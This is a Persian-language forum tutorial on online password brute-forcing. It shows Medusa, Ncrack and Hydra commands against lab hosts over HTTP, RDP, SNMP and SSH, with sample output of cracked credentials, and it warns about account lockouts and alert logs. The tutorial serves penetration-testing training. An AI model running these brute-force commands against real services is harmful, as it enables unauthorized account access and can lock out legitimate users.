0 امتیاز
762 بازدید
در لینوکس توسط مدیر کل (15.6k امتیاز)

حملات آنلاین علیه پسوردها شامل تلاش هایی برای حدس زدن پسورد (password-guessing) های سرویس های تحت شبکه است که از محیط احراز هویت username و پسورد استفاده میکنند. این حمله شامل سرویس هایی نظیر HTTP, SSH, VNC, SNMP, POP3 و ... میشود. به منظور خودکار کردن حملات پسورد علیه یک سرویس تحت شبکه، باید بتوانیم درخواست احراز هویت پشت سر هم برای پروتکل مورد استفاده در آن سرویس تولید کنیم. خوشبختانه در این مورد ابزاری مانند Hydra, Medusa, Ncrack و حتی Metasploit بکمک ما می ایند و میتوانند درخواست های احراز هویت بسیاری را تولید کنند.
 

Hydra, Medusa و Ncrack


این سه ابزار را شاید بتوان گفت محبوبترین ابزار در انجام ممیزی امنیت پسورد هستند. با این حال این ابزار نقاط قدرت و ضعف خود را دارند و در عین حال پروتکل های مختلف را نیز پشتیبانی میکنند. هرکدام از این سه ابزار رفتاری و عملکردی شبیه به دیگری دارد اما با این وجود باید برای یادگیری کار کردن با ان ها زمانی را کنار گذاشت. ارزش وقت گذاشتن را دارند!

HTTP Brute-force


ابزار Medusa یک ابزار سریع، موازی کار و ماژولار در زمینه Brute-force کردن لاگین در نظر گرفته شده است. مثال زیر نمونه ای از حمله Brute-force با استفاده از ابزار Medusa است که بر علیه یک دایرکتوری وب محافظت شده صورت می پذیرد:

root@kali:~# medusa –h 192.168.11.219 -u admin -P password-file.txt -M http -m  DIR:/admin  -T 10
Account Check: [http] Host:192.168.11.219 (1 of 1, 0 complete) User:admin (1 of 1, 0 complete) Password:acquires (20 of 334 complete)
Account check: [http] Host: 192.168.11.219 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) Password: Backup2 (21 of 334 complete)
Account Found: [http] Host:192.168.11.219 User: admin  Password: backup2 [success]


RDP Brute-force


ابزار Ncrack که توسط سازندگان Nmap توسعه داده شده است، یک ابزار کرک احراز هویت شبکه ای و در عین حال بسیار پرسرعت است. ابزار Ncrack یکی از معدود ابزاری است که میتواند با اطمینان و سرعت لازم، پروتکل RDP ویندوز را مورد Brute-force قرار دهد:

root@kali:~#  ncrack -vv --user offsec -P password-file.txt  rdp://192.168.11.35
starting Ncrack 0.4ALPHA (http://ncrack.org) at 2015-09-28  14:14 EDT

Discovered credentials on rdp://192.168.11.35:3389  'offsec'   'offsec!'


SNMP Brute-force


THC-Hydra یکی دیگر از کرکرهای قدرتمند پسوردهای آنلاین است. از این ابزار میتوان در کرک پروتکل های مختلف احراز هویت مانند SNMP استفاده کرد:

root@kali:~# hydra –P password-file.txt  -v  192.168.11.219  snmp
Hydra (http://thc.org/thc-hydra) starting at 2015-09-28  14:15:00
[Data] 16 tasks, 1 server, 333 login ties (l:1/p:333), ~20 tries per task
[Data] attacking service snmp on port 161
[Verbose] Resolving address … done
[161] [snmp] host: 192.168.11.219   login:   password: manager


SSH Brute-force


ابزار Hydra در Brute-force پروتکل SSH نیز کارایی خود را نشان میدهد:

root@kali:~# hydra –l root –P  password-file.txt  192.168.11.219  ssh
Hydra v7.4.2 ©2012 by van Hauser/THC & David Maciejak
Hydra (http://thc.org/thc-hydra) starting at 2015-09-28  14:15:00
[Data] 16 tasks, 1 server, 332 login tries (l:1/p:332), ~20 tries per task
[Data] attacking service ssh on port 22
[ERROR] ssh protocol error
[ERROR] ssh protocol error
[22] [ssh] host:192.168.11.219   login:root   password: toor
1 of 1 target successfully completed, 1 valid password found
Hydra (http://thc.org/thc-hydra) starting at 2015-09-28  14:15:00

root@kali:~#


قفل شدن اکانت و لاگ ها هشدار دهنده


حملات Online password Brute-force، بر طبق طبع و ذاتشان بسیار پر سر و صدا و پرنمود هستند. تلاش های لاگین ناموفق آنهم به تعداد بسیار زیاد معمولا تولید لاگ و هشدار بر روی سیستم مقصد میکند. در برخی حالات سیستم هدف ممکن است طور تنظیم شده باشد که اکانت را پس از تعداد معینی لاگین ناموفق، لاک کند. حال اگر شما در حال اجرای یک تست نفوذ بر روی شبکه خودتان باشید، همین امر میتواند یک خروجی ناموفق را در حین اجرای تست نفوذ برای شما به همراه داشته باشد؛ چرا که کاربران مجاز ممکن است بدین واسطه نتوانند با حساب کاربری خود به سروی سهای مورد نظر خود دسترسی پیدا کنند و این امر تا زمانی که مدیر سیستم مجددا این حساب های کاربری را فعال نکند، ادامه خواهد داشت. پس حتما قبل از اجرای بی حساب و کتاب یک حمله Brute-force بصورت آنلاین این نکات را مد نظر داشته باشید.

پاسخ شما

حریم شخصی : آدرس ایمیل شما محفوظ میماند و برای استفاده های تجاری و تبلیغاتی به کار نمی رود
FOXNET محلی برای دانستن واشتراک مطالبی که نمی دانستید

سوالات مشابه

0 امتیاز
0 پاسخ 484 بازدید
سوال شده ژوئن 9, 2017 در لینوکس توسط admin مدیر کل (15.6k امتیاز)
0 امتیاز
0 پاسخ 488 بازدید
سوال شده می 27, 2017 در امنیت توسط admin مدیر کل (15.6k امتیاز)
0 امتیاز
0 پاسخ 293 بازدید
سوال شده فوریه 15, 2022 در لینوکس توسط admin مدیر کل (15.6k امتیاز)
0 امتیاز
0 پاسخ 542 بازدید
0 امتیاز
0 پاسخ 500 بازدید
سوال شده ژوئن 20, 2016 در لینوکس توسط admin مدیر کل (15.6k امتیاز)
...